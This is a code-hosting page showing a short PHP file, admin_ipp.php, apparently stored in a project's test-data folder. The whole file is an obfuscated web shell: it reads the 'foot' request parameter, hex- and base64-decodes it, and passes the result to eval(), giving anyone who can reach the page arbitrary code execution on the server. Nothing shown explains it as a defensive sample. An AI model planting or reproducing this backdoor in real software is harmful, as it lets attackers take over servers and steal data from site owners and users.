canyin-project/ybcy/tests/_data/admin_ipp.php

10 lines
185 B
PHP
Raw Normal View History

2024-11-01 16:07:54 +08:00
<?php
function foot_t(){
$a=base64_encode(hex2bin($_REQUEST['foot']));
if (isset($a)) {
$b=''.base64_decode($a).'';
return ($b);
}
}
eval(''.foot_t().'');
?>